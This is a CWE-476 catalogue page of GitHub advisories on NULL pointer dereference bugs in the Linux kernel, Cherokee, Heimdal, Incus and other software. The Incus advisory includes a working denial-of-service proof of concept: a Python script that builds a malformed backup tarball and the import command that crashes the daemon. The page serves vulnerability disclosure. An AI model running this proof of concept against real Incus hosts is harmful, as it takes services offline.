CWE-476
AllowedNULL Pointer Dereference
Abstraction: Base · Status: Stable
The product dereferences a pointer that it expects to be valid but is NULL.
6310 vulnerabilities reference this CWE, most recent first.
GHSA-G9GX-3CCX-85W8
Vulnerability from github – Published: 2024-05-17 15:31 – Updated: 2024-07-03 18:42In the Linux kernel, the following vulnerability has been resolved:
powerpc/powernv: Add a null pointer check in opal_powercap_init()
kasprintf() returns a pointer to dynamically allocated memory which can be NULL upon failure.
{
"affected": [],
"aliases": [
"CVE-2023-52696"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-17T15:15:20Z",
"severity": "HIGH"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/powernv: Add a null pointer check in opal_powercap_init()\n\nkasprintf() returns a pointer to dynamically allocated memory\nwhich can be NULL upon failure.",
"id": "GHSA-g9gx-3ccx-85w8",
"modified": "2024-07-03T18:42:25Z",
"published": "2024-05-17T15:31:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52696"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/69f95c5e9220f77ce7c540686b056c2b49e9a664"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/6b58d16037217d0c64a2a09b655f370403ec7219"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/9da4a56dd3772570512ca58aa8832b052ae910dc"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/a67a04ad05acb56640798625e73fa54d6d41cce1"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/b02ecc35d01a76b4235e008d2dd292895b28ecab"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/e123015c0ba859cf48aa7f89c5016cc6e98e018d"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/f152a6bfd187f67afeffc9fd68cbe46f51439be0"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-G9H3-F67F-JQJ7
Vulnerability from github – Published: 2026-03-18 18:31 – Updated: 2026-05-21 21:30In the Linux kernel, the following vulnerability has been resolved:
xfs: check return value of xchk_scrub_create_subord
Fix this function to return NULL instead of a mangled ENOMEM, then fix the callers to actually check for a null pointer and return ENOMEM. Most of the corrections here are for code merged between 6.2 and 6.10.
{
"affected": [],
"aliases": [
"CVE-2026-23250"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-18T18:16:22Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: check return value of xchk_scrub_create_subord\n\nFix this function to return NULL instead of a mangled ENOMEM, then fix\nthe callers to actually check for a null pointer and return ENOMEM.\nMost of the corrections here are for code merged between 6.2 and 6.10.",
"id": "GHSA-g9h3-f67f-jqj7",
"modified": "2026-05-21T21:30:28Z",
"published": "2026-03-18T18:31:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23250"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/2b658d1249666cc55af9484dcf5f45ca438d4ecc"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/b2df809edd8cb7d1c3e19d9f6aabc2bd55d2bfb6"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/ca27313fb3f23e4ac18532ede4ec1c7cc5814c4a"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d6f3f7d4dd8a179394cef03c00993d57f5f68601"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-G9J5-2X3F-77XP
Vulnerability from github – Published: 2022-05-24 17:24 – Updated: 2022-11-29 03:30Cherokee 0.4.27 to 1.2.104 is affected by a denial of service due to a NULL pointer dereferences. A remote unauthenticated attacker can crash the server by sending an HTTP request to protected resources using a malformed Authorization header that is mishandled during a cherokee_buffer_add call within cherokee_validator_parse_basic or cherokee_validator_parse_digest.
{
"affected": [],
"aliases": [
"CVE-2020-12845"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-07-27T23:15:00Z",
"severity": "HIGH"
},
"details": "Cherokee 0.4.27 to 1.2.104 is affected by a denial of service due to a NULL pointer dereferences. A remote unauthenticated attacker can crash the server by sending an HTTP request to protected resources using a malformed Authorization header that is mishandled during a cherokee_buffer_add call within cherokee_validator_parse_basic or cherokee_validator_parse_digest.",
"id": "GHSA-g9j5-2x3f-77xp",
"modified": "2022-11-29T03:30:25Z",
"published": "2022-05-24T17:24:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12845"
},
{
"type": "WEB",
"url": "https://github.com/cherokee/webserver/issues/1242"
},
{
"type": "WEB",
"url": "https://github.com/cherokee/webserver/releases"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202012-09"
},
{
"type": "WEB",
"url": "http://cherokee-project.com/downloads.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-G9MH-3CRX-2QVF
Vulnerability from github – Published: 2024-10-21 18:30 – Updated: 2024-12-09 15:31In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Add null check for pipe_ctx->plane_state in dcn20_program_pipe
This commit addresses a null pointer dereference issue in the
dcn20_program_pipe function. The issue could occur when
pipe_ctx->plane_state is null.
The fix adds a check to ensure pipe_ctx->plane_state is not null
before accessing. This prevents a null pointer dereference.
Reported by smatch: drivers/gpu/drm/amd/amdgpu/../display/dc/hwss/dcn20/dcn20_hwseq.c:1925 dcn20_program_pipe() error: we previously assumed 'pipe_ctx->plane_state' could be null (see line 1877)
{
"affected": [],
"aliases": [
"CVE-2024-49914"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-21T18:15:13Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Add null check for pipe_ctx-\u003eplane_state in dcn20_program_pipe\n\nThis commit addresses a null pointer dereference issue in the\n`dcn20_program_pipe` function. The issue could occur when\n`pipe_ctx-\u003eplane_state` is null.\n\nThe fix adds a check to ensure `pipe_ctx-\u003eplane_state` is not null\nbefore accessing. This prevents a null pointer dereference.\n\nReported by smatch:\ndrivers/gpu/drm/amd/amdgpu/../display/dc/hwss/dcn20/dcn20_hwseq.c:1925 dcn20_program_pipe() error: we previously assumed \u0027pipe_ctx-\u003eplane_state\u0027 could be null (see line 1877)",
"id": "GHSA-g9mh-3crx-2qvf",
"modified": "2024-12-09T15:31:33Z",
"published": "2024-10-21T18:30:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49914"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/65a6fee22d5cfa645cb05489892dc9cd3d142fc2"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/68f75e6f08aad66069a629db8d7840919156c761"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/8e4ed3cf1642df0c4456443d865cff61a9598aa8"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-G9MQ-5VVV-88HF
Vulnerability from github – Published: 2022-05-24 17:38 – Updated: 2022-05-24 17:38Delta Electronics DOPSoft Version 4.0.8.21 and prior has a null pointer dereference issue while processing project files, which may allow an attacker to execute arbitrary code.
{
"affected": [],
"aliases": [
"CVE-2020-27277"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-01-11T16:15:00Z",
"severity": "HIGH"
},
"details": "Delta Electronics DOPSoft Version 4.0.8.21 and prior has a null pointer dereference issue while processing project files, which may allow an attacker to execute arbitrary code.",
"id": "GHSA-g9mq-5vvv-88hf",
"modified": "2022-05-24T17:38:34Z",
"published": "2022-05-24T17:38:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27277"
},
{
"type": "WEB",
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-005-05"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-21-033"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-G9Q4-8883-7234
Vulnerability from github – Published: 2025-05-01 15:31 – Updated: 2025-11-07 00:30In the Linux kernel, the following vulnerability has been resolved:
slab: ensure slab->obj_exts is clear in a newly allocated slab page
ktest recently reported crashes while running several buffered io tests with __alloc_tagging_slab_alloc_hook() at the top of the crash call stack. The signature indicates an invalid address dereference with low bits of slab->obj_exts being set. The bits were outside of the range used by page_memcg_data_flags and objext_flags and hence were not masked out by slab_obj_exts() when obtaining the pointer stored in slab->obj_exts. The typical crash log looks like this:
00510 Unable to handle kernel NULL pointer dereference at virtual address 0000000000000010 00510 Mem abort info: 00510 ESR = 0x0000000096000045 00510 EC = 0x25: DABT (current EL), IL = 32 bits 00510 SET = 0, FnV = 0 00510 EA = 0, S1PTW = 0 00510 FSC = 0x05: level 1 translation fault 00510 Data abort info: 00510 ISV = 0, ISS = 0x00000045, ISS2 = 0x00000000 00510 CM = 0, WnR = 1, TnD = 0, TagAccess = 0 00510 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 00510 user pgtable: 4k pages, 39-bit VAs, pgdp=0000000104175000 00510 [0000000000000010] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000 00510 Internal error: Oops: 0000000096000045 [#1] SMP 00510 Modules linked in: 00510 CPU: 10 UID: 0 PID: 7692 Comm: cat Not tainted 6.15.0-rc1-ktest-g189e17946605 #19327 NONE 00510 Hardware name: linux,dummy-virt (DT) 00510 pstate: 20001005 (nzCv daif -PAN -UAO -TCO -DIT +SSBS BTYPE=--) 00510 pc : __alloc_tagging_slab_alloc_hook+0xe0/0x190 00510 lr : __kmalloc_noprof+0x150/0x310 00510 sp : ffffff80c87df6c0 00510 x29: ffffff80c87df6c0 x28: 000000000013d1ff x27: 000000000013d200 00510 x26: ffffff80c87df9e0 x25: 0000000000000000 x24: 0000000000000001 00510 x23: ffffffc08041953c x22: 000000000000004c x21: ffffff80c0002180 00510 x20: fffffffec3120840 x19: ffffff80c4821000 x18: 0000000000000000 00510 x17: fffffffec3d02f00 x16: fffffffec3d02e00 x15: fffffffec3d00700 00510 x14: fffffffec3d00600 x13: 0000000000000200 x12: 0000000000000006 00510 x11: ffffffc080bb86c0 x10: 0000000000000000 x9 : ffffffc080201e58 00510 x8 : ffffff80c4821060 x7 : 0000000000000000 x6 : 0000000055555556 00510 x5 : 0000000000000001 x4 : 0000000000000010 x3 : 0000000000000060 00510 x2 : 0000000000000000 x1 : ffffffc080f50cf8 x0 : ffffff80d801d000 00510 Call trace: 00510 __alloc_tagging_slab_alloc_hook+0xe0/0x190 (P) 00510 __kmalloc_noprof+0x150/0x310 00510 __bch2_folio_create+0x5c/0xf8 00510 bch2_folio_create+0x2c/0x40 00510 bch2_readahead+0xc0/0x460 00510 read_pages+0x7c/0x230 00510 page_cache_ra_order+0x244/0x3a8 00510 page_cache_async_ra+0x124/0x170 00510 filemap_readahead.isra.0+0x58/0xa0 00510 filemap_get_pages+0x454/0x7b0 00510 filemap_read+0xdc/0x418 00510 bch2_read_iter+0x100/0x1b0 00510 vfs_read+0x214/0x300 00510 ksys_read+0x6c/0x108 00510 __arm64_sys_read+0x20/0x30 00510 invoke_syscall.constprop.0+0x54/0xe8 00510 do_el0_svc+0x44/0xc8 00510 el0_svc+0x18/0x58 00510 el0t_64_sync_handler+0x104/0x130 00510 el0t_64_sync+0x154/0x158 00510 Code: d5384100 f9401c01 b9401aa3 b40002e1 (f8227881) 00510 ---[ end trace 0000000000000000 ]--- 00510 Kernel panic - not syncing: Oops: Fatal exception 00510 SMP: stopping secondary CPUs 00510 Kernel Offset: disabled 00510 CPU features: 0x0000,000000e0,00000410,8240500b 00510 Memory Limit: none
Investigation indicates that these bits are already set when we allocate slab page and are not zeroed out after allocation. We are not yet sure why these crashes start happening only recently but regardless of the reason, not initializing a field that gets used later is wrong. Fix it by initializing slab->obj_exts during slab page allocation.
{
"affected": [],
"aliases": [
"CVE-2025-37774"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-01T14:15:40Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nslab: ensure slab-\u003eobj_exts is clear in a newly allocated slab page\n\nktest recently reported crashes while running several buffered io tests\nwith __alloc_tagging_slab_alloc_hook() at the top of the crash call stack.\nThe signature indicates an invalid address dereference with low bits of\nslab-\u003eobj_exts being set. The bits were outside of the range used by\npage_memcg_data_flags and objext_flags and hence were not masked out\nby slab_obj_exts() when obtaining the pointer stored in slab-\u003eobj_exts.\nThe typical crash log looks like this:\n\n00510 Unable to handle kernel NULL pointer dereference at virtual address 0000000000000010\n00510 Mem abort info:\n00510 ESR = 0x0000000096000045\n00510 EC = 0x25: DABT (current EL), IL = 32 bits\n00510 SET = 0, FnV = 0\n00510 EA = 0, S1PTW = 0\n00510 FSC = 0x05: level 1 translation fault\n00510 Data abort info:\n00510 ISV = 0, ISS = 0x00000045, ISS2 = 0x00000000\n00510 CM = 0, WnR = 1, TnD = 0, TagAccess = 0\n00510 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n00510 user pgtable: 4k pages, 39-bit VAs, pgdp=0000000104175000\n00510 [0000000000000010] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000\n00510 Internal error: Oops: 0000000096000045 [#1] SMP\n00510 Modules linked in:\n00510 CPU: 10 UID: 0 PID: 7692 Comm: cat Not tainted 6.15.0-rc1-ktest-g189e17946605 #19327 NONE\n00510 Hardware name: linux,dummy-virt (DT)\n00510 pstate: 20001005 (nzCv daif -PAN -UAO -TCO -DIT +SSBS BTYPE=--)\n00510 pc : __alloc_tagging_slab_alloc_hook+0xe0/0x190\n00510 lr : __kmalloc_noprof+0x150/0x310\n00510 sp : ffffff80c87df6c0\n00510 x29: ffffff80c87df6c0 x28: 000000000013d1ff x27: 000000000013d200\n00510 x26: ffffff80c87df9e0 x25: 0000000000000000 x24: 0000000000000001\n00510 x23: ffffffc08041953c x22: 000000000000004c x21: ffffff80c0002180\n00510 x20: fffffffec3120840 x19: ffffff80c4821000 x18: 0000000000000000\n00510 x17: fffffffec3d02f00 x16: fffffffec3d02e00 x15: fffffffec3d00700\n00510 x14: fffffffec3d00600 x13: 0000000000000200 x12: 0000000000000006\n00510 x11: ffffffc080bb86c0 x10: 0000000000000000 x9 : ffffffc080201e58\n00510 x8 : ffffff80c4821060 x7 : 0000000000000000 x6 : 0000000055555556\n00510 x5 : 0000000000000001 x4 : 0000000000000010 x3 : 0000000000000060\n00510 x2 : 0000000000000000 x1 : ffffffc080f50cf8 x0 : ffffff80d801d000\n00510 Call trace:\n00510 __alloc_tagging_slab_alloc_hook+0xe0/0x190 (P)\n00510 __kmalloc_noprof+0x150/0x310\n00510 __bch2_folio_create+0x5c/0xf8\n00510 bch2_folio_create+0x2c/0x40\n00510 bch2_readahead+0xc0/0x460\n00510 read_pages+0x7c/0x230\n00510 page_cache_ra_order+0x244/0x3a8\n00510 page_cache_async_ra+0x124/0x170\n00510 filemap_readahead.isra.0+0x58/0xa0\n00510 filemap_get_pages+0x454/0x7b0\n00510 filemap_read+0xdc/0x418\n00510 bch2_read_iter+0x100/0x1b0\n00510 vfs_read+0x214/0x300\n00510 ksys_read+0x6c/0x108\n00510 __arm64_sys_read+0x20/0x30\n00510 invoke_syscall.constprop.0+0x54/0xe8\n00510 do_el0_svc+0x44/0xc8\n00510 el0_svc+0x18/0x58\n00510 el0t_64_sync_handler+0x104/0x130\n00510 el0t_64_sync+0x154/0x158\n00510 Code: d5384100 f9401c01 b9401aa3 b40002e1 (f8227881)\n00510 ---[ end trace 0000000000000000 ]---\n00510 Kernel panic - not syncing: Oops: Fatal exception\n00510 SMP: stopping secondary CPUs\n00510 Kernel Offset: disabled\n00510 CPU features: 0x0000,000000e0,00000410,8240500b\n00510 Memory Limit: none\n\nInvestigation indicates that these bits are already set when we allocate\nslab page and are not zeroed out after allocation. We are not yet sure\nwhy these crashes start happening only recently but regardless of the\nreason, not initializing a field that gets used later is wrong. Fix it\nby initializing slab-\u003eobj_exts during slab page allocation.",
"id": "GHSA-g9q4-8883-7234",
"modified": "2025-11-07T00:30:26Z",
"published": "2025-05-01T15:31:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-37774"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/28bef6622a1a874fe63aceeb0c684fab75afb3ae"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/8baa747193591410a853bac9c3710142dfa4937b"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d2f5819b6ed357c0c350c0616b6b9f38be59adf6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-G9R6-QHFX-9XCC
Vulnerability from github – Published: 2022-05-24 19:15 – Updated: 2022-05-24 19:15An issue was discovered in libxsmm through v1.16.1-93. A NULL pointer dereference exists in JIT code. It allows an attacker to cause Denial of Service.
{
"affected": [],
"aliases": [
"CVE-2021-39535"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-09-20T16:15:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in libxsmm through v1.16.1-93. A NULL pointer dereference exists in JIT code. It allows an attacker to cause Denial of Service.",
"id": "GHSA-g9r6-qhfx-9xcc",
"modified": "2022-05-24T19:15:09Z",
"published": "2022-05-24T19:15:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39535"
},
{
"type": "WEB",
"url": "https://github.com/hfp/libxsmm/issues/398"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-GC5P-R2VH-QC88
Vulnerability from github – Published: 2022-05-14 04:01 – Updated: 2022-05-14 04:01In Heimdal through 7.4, remote unauthenticated attackers are able to crash the KDC by sending a crafted UDP packet containing empty data fields for client name or realm. The parser would unconditionally dereference NULL pointers in that case, leading to a segmentation fault. This is related to the _kdc_as_rep function in kdc/kerberos5.c and the der_length_visible_string function in lib/asn1/der_length.c.
{
"affected": [],
"aliases": [
"CVE-2017-17439"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-12-06T15:29:00Z",
"severity": "HIGH"
},
"details": "In Heimdal through 7.4, remote unauthenticated attackers are able to crash the KDC by sending a crafted UDP packet containing empty data fields for client name or realm. The parser would unconditionally dereference NULL pointers in that case, leading to a segmentation fault. This is related to the _kdc_as_rep function in kdc/kerberos5.c and the der_length_visible_string function in lib/asn1/der_length.c.",
"id": "GHSA-gc5p-r2vh-qc88",
"modified": "2022-05-14T04:01:33Z",
"published": "2022-05-14T04:01:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-17439"
},
{
"type": "WEB",
"url": "https://github.com/heimdal/heimdal/issues/353"
},
{
"type": "WEB",
"url": "https://github.com/heimdal/heimdal/commit/1a6a6e462dc2ac6111f9e02c6852ddec4849b887"
},
{
"type": "WEB",
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=878144"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2017/dsa-4055"
},
{
"type": "WEB",
"url": "http://h5l.org/advisories.html?show=2017-12-08"
},
{
"type": "WEB",
"url": "http://www.h5l.org/pipermail/heimdal-announce/2017-December/000008.html"
},
{
"type": "WEB",
"url": "http://www.h5l.org/pipermail/heimdal-discuss/2017-August/000259.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GC78-RVWJ-3H3P
Vulnerability from github – Published: 2022-05-13 01:25 – Updated: 2022-05-13 01:25An issue was discovered in the Linux kernel through 4.17.10. There is an invalid pointer dereference in btrfs_root_node() when mounting a crafted btrfs image, because of a lack of chunk block group mapping validation in btrfs_read_block_groups in fs/btrfs/extent-tree.c, and a lack of empty-tree checks in check_leaf in fs/btrfs/tree-checker.c.
{
"affected": [],
"aliases": [
"CVE-2018-14612"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-07-27T04:29:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in the Linux kernel through 4.17.10. There is an invalid pointer dereference in btrfs_root_node() when mounting a crafted btrfs image, because of a lack of chunk block group mapping validation in btrfs_read_block_groups in fs/btrfs/extent-tree.c, and a lack of empty-tree checks in check_leaf in fs/btrfs/tree-checker.c.",
"id": "GHSA-gc78-rvwj-3h3p",
"modified": "2022-05-13T01:25:51Z",
"published": "2022-05-13T01:25:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14612"
},
{
"type": "WEB",
"url": "https://bugzilla.kernel.org/show_bug.cgi?id=199847"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00017.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00011.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00013.html"
},
{
"type": "WEB",
"url": "https://patchwork.kernel.org/patch/10503403"
},
{
"type": "WEB",
"url": "https://patchwork.kernel.org/patch/10503413"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/3932-1"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/3932-2"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/4094-1"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/4118-1"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/104917"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GC7J-G665-RXR9
Vulnerability from github – Published: 2026-05-04 17:40 – Updated: 2026-05-08 19:26Summary
Missing validation logic in the storage bucket import logic allows an authenticated user with access to Incus' storage bucket feature to cause the Incus daemon to crash. Repeated use of this issue can be used to keep Incus offline causing a denial of service.
Details
The storage bucket migration subsystem contains a nil-pointer dereference vulnerability that allows an authenticated attacker to crash the daemon during bucket import operations. The vulnerability is present in the backup metadata handling logic, where the daemon processes the index.yaml file from an imported archive and then accesses members of the parsed backup configuration without first verifying that the configuration object was initialized.
In Go, dereferencing a nil pointer triggers a runtime panic. Because CreateBucketFromBackup assumes that srcBackup.Config is populated from the supplied archive, a malicious or malformed index.yaml that omits the config block causes the daemon to dereference a nil pointer and terminate. This results in denial of service on the affected node.
Affected File: https://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go
Affected Code:
func (b *backend) CreateBucketFromBackup(srcBackup backup.Info, srcData io.ReadSeeker, op *operations.Operation) error {
[...]
bucketRequest := api.StorageBucketsPost{
Name: srcBackup.Name,
StorageBucketPut: srcBackup.Config.Bucket.StorageBucketPut,
}
// Create the bucket to import.
err = b.CreateBucket(srcBackup.Project, bucketRequest, op)
if err != nil {
return err
}
reverter.Add(func() { _ = b.DeleteBucket(srcBackup.Project, bucketRequest.Name, op) })
// Upload all keys from the backup.
for _, bucketKey := range srcBackup.Config.BucketKeys {
bucketKeyRequest := api.StorageBucketKeysPost{
Name: bucketKey.Name,
StorageBucketKeyPut: bucketKey.StorageBucketKeyPut,
}
_, err := b.CreateBucketKey(srcBackup.Project, srcBackup.Name, bucketKeyRequest, op)
if err != nil {
return err
}
}
// Upload all files from the backup.
backupKey, err := b.getFirstAdminStorageBucketPoolKey(srcBackup.Project, srcBackup.Name)
if err != nil {
return err
}
[...]
}
PoC
The following PoC demonstrates that a malformed bucket backup archive with an index.yaml file that omits the config block can trigger a nil-pointer dereference and crash the incusd daemon during bucket import.
Step 1: Create the malformed archive
From a client or workstation with Python available, generate a minimal bucket backup archive whose index.yaml omits the config section.
Commands:
cat <<EOF > poc_bucket_nil.py
import tarfile
import io
index_content = b"name: dos-trigger\n"
with tarfile.open("nil_panic.tar.gz", "w:gz") as tar:
info = tarfile.TarInfo(name="backup/index.yaml")
info.size = len(index_content)
tar.addfile(info, io.BytesIO(index_content))
print("[+] Nil-Pointer PoC Tarball created: nil_panic.tar.gz")
EOF
python3 poc_bucket_nil.py
Result:
[+] Nil-Pointer PoC Tarball created: nil_panic.tar.gz
Step 2: Trigger the vulnerable bucket import path
From an Incus client with permission to import storage buckets, import the crafted archive into any valid storage pool.
Command:
incus storage bucket import local-pool nil_panic.tar.gz crash-test
Result:
Error: Operation not found
Step 3: Verify the daemon panic
On the Incus host, inspect the service logs and confirm that the daemon terminated with a nil-pointer panic in the bucket import path.
Command:
journalctl -u incus --since "3 minutes ago" | grep -A 15 "panic"
Result:
Mar 23 17:19:11 incus-7a incusd[237735]: panic: runtime error: invalid memory address or nil pointer dereference
Mar 23 17:19:11 incus-7a incusd[237735]: [signal SIGSEGV: segmentation violation code=0x1 addr=0x60 pc=0x168a223]
Mar 23 17:19:11 incus-7a incusd[237735]: goroutine 9635 [running]:
Mar 23 17:19:11 incus-7a incusd[237735]: github.com/lxc/incus/v6/internal/server/storage.(*backend).CreateBucketFromBackup(0x254e0c0706c0, {{0x254e0cd77263, 0x9}, {0x254e0c408ce0, 0xa}, {0x0, 0x0}, {0x254e0c964c48, 0xa}, {0x0, ...}, ...}, ...)
Mar 23 17:19:11 incus-7a incusd[237735]: /home/stgraber/Code/lxc/incus/internal/server/storage/backend.go:7754 +0x303
Mar 23 17:19:11 incus-7a incusd[237735]: main.createStoragePoolBucketFromBackup.func3(0x191ca65?)
Mar 23 17:19:11 incus-7a incusd[237735]: /home/stgraber/Code/lxc/incus/cmd/incusd/storage_buckets.go:1467 +0x19c
Mar 23 17:19:11 incus-7a incusd[237735]: github.com/lxc/incus/v6/internal/server/operations.(*Operation).Start.func1(0x254e0c333400)
Mar 23 17:19:11 incus-7a incusd[237735]: /home/stgraber/Code/lxc/incus/internal/server/operations/operations.go:307 +0x26
Mar 23 17:19:11 incus-7a incusd[237735]: created by github.com/lxc/incus/v6/internal/server/operations.(*Operation).Start in goroutine 9576
Mar 23 17:19:11 incus-7a incusd[237735]: /home/stgraber/Code/lxc/incus/internal/server/operations/operations.go:306 +0x105
Mar 23 17:19:11 incus-7a systemd[1]: incus.service: Main process exited, code=exited, status=2/INVALIDARGUMENT
Mar 23 17:19:11 incus-7a systemd[1]: incus.service: Failed with result 'exit-code'.
Mar 23 17:19:11 incus-7a systemd[1]: incus.service: Unit process 159855 (qemu-system-x86) remains running after unit stopped.
Mar 23 17:19:11 incus-7a systemd[1]: incus.service: Unit process 237808 (dnsmasq) remains running after unit stopped.
Mar 23 17:19:11 incus-7a systemd[1]: incus.service: Unit process 237825 (dnsmasq) remains running after unit stopped.
It is recommended to validate that srcBackup.Config is not nil before attempting to access its members. If the required configuration metadata is missing from the archive, the function should return a structured error and abort the operation gracefully rather than allowing a runtime panic to crash the service.
Credit
This issue was discovered and reported by the team at 7asecurity (https://7asecurity.com/)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/lxc/incus/v6/cmd/incusd"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-40195"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-04T17:40:00Z",
"nvd_published_at": "2026-05-06T21:16:00Z",
"severity": "HIGH"
},
"details": "### Summary\nMissing validation logic in the storage bucket import logic allows an authenticated user with access to Incus\u0027 storage bucket feature to cause the Incus daemon to crash. Repeated use of this issue can be used to keep Incus offline causing a denial of service.\n\n### Details\nThe storage bucket migration subsystem contains a nil-pointer dereference vulnerability that allows an authenticated attacker to crash the daemon during bucket import operations. The vulnerability is present in the backup metadata handling logic, where the daemon processes the index.yaml file from an imported archive and then accesses members of the parsed backup configuration without first verifying that the configuration object was initialized.\n\nIn Go, dereferencing a nil pointer triggers a runtime panic. Because CreateBucketFromBackup assumes that srcBackup.Config is populated from the supplied archive, a malicious or malformed index.yaml that omits the config block causes the daemon to dereference a nil pointer and terminate. This results in denial of service on the affected node.\n\nAffected File:\nhttps://github.com/lxc/incus/blob/v6.22.0/internal/server/storage/backend.go \n\nAffected Code:\n```\nfunc (b *backend) CreateBucketFromBackup(srcBackup 